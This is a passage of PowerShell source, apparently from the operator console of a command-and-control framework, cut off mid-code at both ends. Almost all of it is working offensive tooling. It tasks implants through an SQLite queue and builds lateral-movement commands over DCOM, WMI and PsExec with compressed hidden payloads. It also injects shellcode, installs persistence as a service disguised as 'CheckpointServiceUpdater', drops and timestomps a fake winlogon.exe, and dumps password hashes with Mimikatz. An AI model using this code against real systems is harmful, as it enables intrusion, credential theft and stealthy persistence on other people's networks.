[HashTable]::Synchronized(@{}) `$kill.log = "1" function Stop-Daisy { `$kill.log = 2 Netsh.exe advfirewall firewall del rule name=`"$firewallName`" (new-object system.net.webclient).downloadstring("http://localhost:$port") } if (!`$t) { if (Test-Administrator) { `$Runspace = [RunspaceFactory]::CreateRunspace() `$Runspace.Open() `$Runspace.SessionStateProxy.SetVariable('Kill',`$Kill) `$Jobs = @() `$Job = [powershell]::Create().AddScript({$NewScript}) `$Job.Runspace = `$Runspace `$Job.BeginInvoke() | Out-Null echo "" echo "[+] Running DaisyServer as Administrator:" } else { `$Runspace = [RunspaceFactory]::CreateRunspace() `$Runspace.Open() `$Runspace.SessionStateProxy.SetVariable('Kill',`$Kill) `$Jobs = @() `$Job = [powershell]::Create().AddScript({$NewScript}) `$Job.Runspace = `$Runspace `$Job.BeginInvoke() | Out-Null echo "" echo "[+] Running DaisyServer as Standard User, must use -localhost flag for this to work:" } echo "[+] To stop the Daisy Server, Stop-Daisy current process" } "@ return $rundaisy } function Resolve-PathSafe { param ( [string] $Path ) $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path) } Function Get-FileName($Dir) { [System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms") | Out-Null $OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog $OpenFileDialog.initialDirectory = $Dir $OpenFileDialog.filter = "ANY *.* | *.*" $OpenFileDialog.ShowDialog() | Out-Null $OpenFileDialog.filename } function Upload-File { param ( [string] $Source, [string] $Destination ) if (!$Source) { $Source = Get-FileName "C:\" } if (!$Destination) { $Destination = Read-Host "Destination Location\File Name (C:\Temp\File.txt)" } $Source = Resolve-PathSafe $Source $bufferSize = 90000 $buffer = New-Object byte[] $bufferSize $reader = [System.IO.File]::OpenRead($Source) $base64 = $null $bytesRead = 0 do { $bytesRead = $reader.Read($buffer, 0, $bufferSize); $base64 += ([Convert]::ToBase64String($buffer, 0, $bytesRead)); } while ($bytesRead -eq $bufferSize); "Upload-File -Destination `"$Destination`" -Base64 $base64" $reader.Dispose() } function CheckModuleLoaded { param ( [string] $ModuleName, [string] $IMRandomURI ) $ModuleName = $ModuleName.ToLower(); $modsloaded = Invoke-SqliteQuery -DataSource $Database -Query "SELECT ModsLoaded FROM Implants WHERE RandomURI='$IMRandomURI'" -As SingleValue if (!$modsloaded.contains("$ModuleName")){ $modsloaded = $modsloaded + " $ModuleName" Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET ModsLoaded='$modsloaded' WHERE RandomURI='$IMRandomURI'"|Out-Null $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $IMRandomURI Command = "LoadModule $ModuleName" } | Out-Null } } function RunImplantCommand { param ( [string] $Command, [string] $IMRandomURI ) $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $IMRandomURI Command = $Command } | Out-Null } function creds { param ( [string] $action, [string] $username, [string] $password, [string] $hash, [string] $credsID ) switch ($action){ "dump" { $dbResult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Creds" -As PSObject Write-Output -InputObject $dbResult | ft -AutoSize | Out-Host $t = $dbResult | ft -AutoSize | Out-String return $t } "add" { if ($password){ $t = add-creds -username $username -password $password return $t } elseif ($hash){ $t = add-creds -username $username -hash $hash return $t } else { return "Unable to create credentials in database." } } "del" { $t = Del-Creds $CredsID return $t } "search" { $t = Search-Creds $username return $t } default { return "No action defined for: '$action'" } } } function Add-Creds { param ( [string] $Username, [string] $Password, [string] $Hash ) if ($Username){ Invoke-SqliteQuery -DataSource $Database -Query "INSERT INTO Creds (username, password, hash) VALUES ('$username','$password','$hash')"|Out-Null return "$Username added to the database" } else { return "No username or password specified. Please complete both arguments." } } function Search-Creds { param ( [string] $Username ) if ($Username){ $dbResult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Creds WHERE username LIKE '%$username%'" -As PSObject Write-Output -InputObject $dbResult | ft -AutoSize | Out-Host return $dbResult | ft -AutoSize | Out-String } else { return "No username specified. Please complete all necessary arguments." } } function Del-Creds { param ( [string] $CredsID ) if ($credsID){ $dbResult = Invoke-SqliteQuery -Datasource $database -Query "SELECT credsid, username FROM Creds Where CredsID == '$credsID'" -As DataRow $caption = "Delete Credentials from Database?"; $message = "Credential: " + $dbResult.Item(0) + " - " + $dbResult.Item(1); $yes = new-Object System.Management.Automation.Host.ChoiceDescription "&Yes","YES"; $no = new-Object System.Management.Automation.Host.ChoiceDescription "&No","NO"; $choices = [System.Management.Automation.Host.ChoiceDescription[]]($yes,$no); $answer = $host.ui.PromptForChoice($caption,$message,$choices,0) switch ($answer){ 0 {Invoke-SqliteQuery -Datasource $database -Query "DELETE FROM Creds Where CredsID == '$credsID'" | out-null; return "Deleting Credentials"} 1 {return "No selected, no changes made";} } } else { return "No CredsID specified. Please complete all necessary arguments." } } function invoke-dcomdaisypayload { param( [Parameter(Mandatory=$true)][string]$target, [Parameter(Mandatory=$true)][string]$name ) if (Test-Path "$FolderPath\payloads\$($name).bat"){ $proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat" $pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $proxypayload`",`"7`")" return $pscommand } else { write-host "Need to run Invoke-DaisyChain first" return $null } } function invoke-wmidaisypayload { param( [Parameter(Mandatory=$true)][string]$target, [Parameter(Mandatory=$true)][string]$name, [Parameter(Mandatory=$true)][string]$domain, [Parameter(Mandatory=$true)][string]$user, [Parameter(Mandatory=$false)][string]$password, [Parameter(Mandatory=$false)][string]$hash ) if (Test-Path "$FolderPath\payloads\$($name).bat"){ CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri $proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat" $pscommand = $pscommand -replace 'Invoke-WMIDaisyPayload', 'Invoke-WMIExec' return $pscommand + " -command '$proxypayload'" } else { write-host "Need to run Invoke-DaisyChain first" return $null } } function invoke-psexecdaisypayload { param( [Parameter(Mandatory=$true)][string]$target, [Parameter(Mandatory=$true)][string]$name, [Parameter(Mandatory=$true)][string]$domain, [Parameter(Mandatory=$true)][string]$user, [Parameter(Mandatory=$false)][string]$password, [Parameter(Mandatory=$false)][string]$hash ) if (Test-Path "$FolderPath\payloads\$($name).bat"){ CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri $proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat" $pscommand = $pscommand -replace 'Invoke-PsExecDaisyPayload', 'Invoke-PsExec' $proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", "" $rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload)) $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload) $CompressedStream = New-Object IO.MemoryStream $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) $DeflateStream.Dispose() $CompressedScriptBytes = $CompressedStream.ToArray() $CompressedStream.Dispose() $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) $NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' return $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`"" } else { write-host "Need to run Invoke-DaisyChain first" return $null } } function migrate-daisy { param( $name, [switch]$x86, [switch]$x64, $ProcID, $ProcessPath, $arch ) $params = "" if ($x64.IsPresent) {$params = $params + " -x64"} if ($x86.IsPresent) {$params = $params + " -x86"} if ($ProcessPath) {$params = $params + " -ProcessPath $ProcessPath"} if ($ProcID) {$params = $params + " -ProcID $ProcID"} if (Test-Path "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin"){ CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $bytes = (Get-Content "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode$($arch) = `"$base64`"" RunImplantCommand $commandstring $psrandomuri return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)" } else { write-host "Need to run Invoke-DaisyChain first" return $null } } function migrate($psrandomuri, $params) { $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE RandomURI='$psrandomuri'" -As PSObject $im_arch = $dbresult.Arch $im_type = $dbresult.Pivot if ($im_arch -eq "AMD64"){ $arch = "64" } else { $arch = "86" } if ($params -like "*x86*"){ $arch = "86" } if ($params -like "*x64*"){ $arch = "64" } CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri if ($im_type -eq "Normal"){ if (Test-Path "$FolderPath\payloads\Posh-shellcode_x$($arch).bin"){ $bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x$($arch).bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode$($arch) = `"$base64`"" RunImplantCommand $commandstring $psrandomuri return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)" } else { write-host "Error cannot find shellcode" return $null } } elseif ($im_type -eq "Daisy"){ $Name = read-host "Name required: " if (Test-Path "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin"){ $bytes = (Get-Content "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode$($arch) = `"$base64`"" RunImplantCommand $commandstring $psrandomuri return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)" } else { write-host "Need to run Invoke-DaisyChain first" return $null } } elseif ($im_type -eq "Proxy"){ if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x$($arch).bin"){ $bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x$($arch).bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode$($arch) = `"$base64`"" RunImplantCommand $commandstring $psrandomuri return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)" } else { write-host "Need to run CreateProxyPayload first" return $null } } } function Get-CompressedByteArray ([byte[]] $byteArray) { [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) $gzipStream.Write( $byteArray, 0, $byteArray.Length ) $gzipStream.Close() $output.Close() [Convert]::ToBase64String($output.ToArray()) } function Get-DecompressedByteArray ([byte[]] $byteArray) { $input = New-Object System.IO.MemoryStream( , $byteArray ) $output = New-Object System.IO.MemoryStream $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close() $input.Close() [byte[]] $byteOutArray = $output.ToArray() $byteOutArray } startup function runcommand { param ( [string] $pscommand, [string] $psrandomuri ) if (($pscommand.ToLower().StartsWith('load-module')) -or ($pscommand.ToLower().StartsWith('loadmodule'))) { $pscommand = $pscommand -replace "load-module","loadmodule" $params = $pscommand -replace "loadmodule","" if (!$params) { $params = Get-FileName -Dir "$($PoshPath)\Modules" $pscommand = "$($pscommand) $($params)" } } if ($pscommand.ToLower() -eq 'inject-shellcode') { CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $fileName = Get-FileName -Dir "$FolderPath\payloads\" $ScriptBytes = Get-Content "$fileName" -Encoding Byte $base64Stream = Get-CompressedByteArray -byteArray $ScriptBytes $Params = Read-Host "Any parameters?" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = '$t="'+$base64Stream+'";$g = New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,[Convert]::FromBase64String($t))), ([IO.Compression.CompressionMode]::Decompress); $g.CopyTo(($o = New-Object System.IO.MemoryStream));' } | Out-Null $pscommand = "Inject-Shellcode -Shellcode (`$o.ToArray()) $Params" } if ($pscommand) { CheckModuleLoaded "Implant-Core.ps1" $psrandomuri } if ($pscommand -eq 'Get-ExternalIP') { $pscommand = '(get-webclient).downloadstring("http://ipecho.net/plain")' } if ($pscommand -eq 'getuid') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue Write-Host $dbresult } if ($pscommand -eq 'ps') { $pscommand = 'get-processfull' } if ($pscommand -eq 'id') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue Write-Host $dbresult } if ($pscommand -eq 'whoami') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue Write-Host $dbresult } if ($pscommand -eq 'Kill-Implant') { $pscommand = 'exit' Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$psrandomuri'"|Out-Null } if ($pscommand -eq 'Show-ServerInfo') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject Write-Host $dbresult } if ($pscommand -eq 'get-pid') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT PID FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue Write-Host $dbresult } if ($pscommand -eq 'Get-ImplantWorkingDirectory') { $pscommand = $null $dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT FolderPath FROM C2Server" -As SingleValue Write-Host $dbresult } if ($pscommand.ToLower().StartsWith('installexe-persistence')) { $cmd = $pscommand -replace "installexe-persistence ","" $cmd = $cmd -replace "installexe-persistence","" $output = upload-file -source $cmd -destination "`$env:temp\winlogon.exe" RunImplantCommand $output $psrandomuri $commandstring2 = "TimeStomp `$env:temp\winlogon.exe `"01/03/2008 12:12 pm`"" RunImplantCommand $commandstring2 $psrandomuri $pscommand = "InstallExe-Persistence" } if ($pscommand -eq 'ListModules') { $pscommand = $null Write-Host -Object "Reading modules from `$env:PSModulePath\* and $PoshPath\Modules\*" $folders = $env:PSModulePath -split ";" foreach ($item in $folders) { $PSmod = Get-ChildItem -Path $item -Include *.ps1 -Name foreach ($mod in $PSmod) { Write-Host $mod } } $listmodules = Get-ChildItem -Path "$PoshPath\Modules" -Name foreach ($mod in $listmodules) { Write-Host $mod } Write-Host -Object "" } if ($pscommand -eq 'ModulesLoaded') { $pscommand = $null $mods = Invoke-SqliteQuery -DataSource $Database -Query "SELECT ModsLoaded FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue Write-Host $mods } if ($pscommand -eq 'Remove-ServiceLevel-Persistence') { $pscommand = "sc.exe delete CPUpdater" } if ($pscommand -eq 'Install-ServiceLevel-Persistence') { $payload = Get-Content -Path "$FolderPath\payloads\payload.bat" $pscommand = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto" } if ($pscommand -eq 'Install-ServiceLevel-PersistenceWithProxy') { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ $payload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $pscommand = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-wmiproxypayload')) { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri $proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $pscommand = $pscommand -replace 'Invoke-WMIProxyPayload', 'Invoke-WMIExec' $pscommand = $pscommand + " -command '$proxypayload'" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-dcomproxypayload')) { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ $proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $target = $pscommand -replace 'invoke-dcomproxypayload -target ', '' $pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $proxypayload`",`"7`")" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-dcomdaisypayload')) { $pscommand = IEX $pscommand } if ($pscommand.ToLower().StartsWith('invoke-dcompayload')) { $payload = Get-Content -Path "$FolderPath\payloads\payload.bat" $target = $pscommand -replace 'invoke-dcomdaisypayload -target ', '' $pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $payload`",`"7`")" } if ($pscommand.ToLower().StartsWith('invoke-wmidaisypayload')) { $pscommand = IEX $pscommand } if ($pscommand.ToLower().StartsWith('invoke-wmipayload')) { if (Test-Path "$FolderPath\payloads\payload.bat"){ CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri $payload = Get-Content -Path "$FolderPath\payloads\payload.bat" $pscommand = $pscommand -replace 'Invoke-WMIPayload', 'Invoke-WMIExec' $pscommand = $pscommand + " -command '$payload'" } else { write-host "Can't find the payload.bat file, run CreatePayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-psexecproxypayload')) { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri $proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $pscommand = $pscommand -replace 'Invoke-PsExecProxyPayload', 'Invoke-PsExec' $proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", "" $rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload)) $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload) $CompressedStream = New-Object IO.MemoryStream $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) $DeflateStream.Dispose() $CompressedScriptBytes = $CompressedStream.ToArray() $CompressedStream.Dispose() $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) $NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' $pscommand = $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`"" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-psexecdaisypayload')) { $pscommand = IEX $pscommand } if ($pscommand.ToLower().StartsWith('invoke-psexecpayload')) { if (Test-Path "$FolderPath\payloads\payload.bat"){ CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri $proxypayload = Get-Content -Path "$FolderPath\payloads\payload.bat" $pscommand = $pscommand -replace 'Invoke-PsExecPayload', 'Invoke-PsExec' $proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", "" $rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload)) $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload) $CompressedStream = New-Object IO.MemoryStream $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) $DeflateStream.Dispose() $CompressedScriptBytes = $CompressedStream.ToArray() $CompressedStream.Dispose() $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) $NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' $pscommand = $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`"" } else { write-host "Can't find the payload.bat file, run CreatePayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('hashdump')) { CheckModuleLoaded "Invoke-Mimikatz.ps1" $psrandomuri $pscommand = "Invoke-Mimikatz -Command `'`"lsadump::sam`"`'" } if ($pscommand.ToLower().StartsWith('get-wlanpass')) { CheckModuleLoaded "Get-WLANPass.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-sqlquery')) { CheckModuleLoaded "Invoke-SqlQuery.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-firewall')) { CheckModuleLoaded "Get-FirewallRules.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('migrate-proxy-x86')) { $psargs = $pscommand -replace 'migrate-proxypayload-x86','' if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x86.bin"){ CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x86.bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode86 = `"$base64`"" RunImplantCommand $commandstring $psrandomuri $pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode86)) $($psargs)" } else { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri $proxypayload = gc "$FolderPath\payloads\proxypayload.bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "`$proxypayload = `"$proxypayload`"" } | Out-Null CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri $pscommand = "invoke-reflectivepeinjection -payload Proxy_x86 $($psargs)" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } } if ($pscommand.ToLower().StartsWith('migrate-proxy-x64')) { $psargs = $pscommand -replace 'migrate-proxypayload-x64','' if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x64.bin"){ CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x64.bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode64 = `"$base64`"" RunImplantCommand $commandstring $psrandomuri $pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode64)) $($psargs)" } else { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri $proxypayload = gc "$FolderPath\payloads\proxypayload.bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "`$proxypayload = `"$proxypayload`"" } | Out-Null CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri $pscommand = "invoke-reflectivepeinjection -payload Proxy_x64 $($psargs)" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } } if ($pscommand.ToLower().StartsWith('migrate-x86')) { $psargs = $pscommand -replace 'migrate-x86','' if (Test-Path "$FolderPath\payloads\Posh-shellcode_x86.bin"){ CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x86.bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode86 = `"$base64`"" RunImplantCommand $commandstring $psrandomuri $pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode86)) $($psargs)" } else { CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri CheckModuleLoaded "NamedPipe.ps1" $psrandomuri $pscommand = "invoke-reflectivepeinjection -payload x86 $($psargs)" } } if ($pscommand.ToLower().StartsWith('migrate-x64')) { $psargs = $pscommand -replace 'migrate-x64','' if (Test-Path "$FolderPath\payloads\Posh-shellcode_x64.bin"){ CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri $bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x64.bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $commandstring = "`$Shellcode64 = `"$base64`"" RunImplantCommand $commandstring $psrandomuri $pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode64)) $($psargs)" } else { CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri CheckModuleLoaded "NamedPipe.ps1" $psrandomuri $pscommand = "Invoke-Shellcode $($psargs)" } } if ($pscommand.ToLower().StartsWith('migrate-daisy-x86')) { $pscommand = $pscommand -replace 'migrate-daisy-x86','migrate-daisy -arch 86' $pscommand = IEX $pscommand } if ($pscommand.ToLower().StartsWith('migrate-daisy-x64')) { $pscommand = $pscommand -replace 'migrate-daisy-x64','migrate-daisy -arch 64' $pscommand = IEX $pscommand } if ($pscommand.ToLower().StartsWith('migrate')) { $pscommand = $pscommand -replace 'migrate ','' $pscommand = $pscommand -replace 'migrate','' $pscommand = IEX "migrate $psrandomuri `"$pscommand`"" } if ($pscommand.ToLower().StartsWith('invoke-psinject-payload')) { CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri CheckModuleLoaded "NamedPipe.ps1" $psrandomuri $psargs = $pscommand -replace 'invoke-psinject-payload','' $pscommand = "invoke-reflectivepeinjection $($psargs)" } if ($pscommand.ToLower().StartsWith('invoke-psinject')) { CheckModuleLoaded "invoke-psinject.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-inveigh')) { CheckModuleLoaded "inveigh.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-bloodhounddata')) { CheckModuleLoaded "bloodhound.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-sniffer')) { CheckModuleLoaded "invoke-sniffer.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('test-adcredential')) { CheckModuleLoaded "test-adcredential.ps1" $psrandomuri } if ($pscommand.ToLower() -eq 'invoke-allchecks') { CheckModuleLoaded "Powerup.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-allchecks')) { CheckModuleLoaded "Powerup.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-privescaudit')) { CheckModuleLoaded "Powerup.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-wscriptuacbypass')) { CheckModuleLoaded "Invoke-WScriptBypassUAC.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-hostscan')) { CheckModuleLoaded "Invoke-Hostscan.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-recentfiles')) { CheckModuleLoaded "Get-RecentFiles.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-tokenmanipulation')) { CheckModuleLoaded "Invoke-TokenManipulation.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-inveigh')) { CheckModuleLoaded "Inveigh.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-smbexec')) { CheckModuleLoaded "Invoke-SMBExec.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('new-zipfile')) { CheckModuleLoaded "Zippy.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-smblogin')) { CheckModuleLoaded "Invoke-SMBExec.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-wmiexec')) { CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-pipekat')) { CheckModuleLoaded "Invoke-Pipekat.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-net')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-domain')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-mapdomaintrust')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-domain')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-kerb')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-mimikatz')) { CheckModuleLoaded "Invoke-Mimikatz.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-userhunter')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if 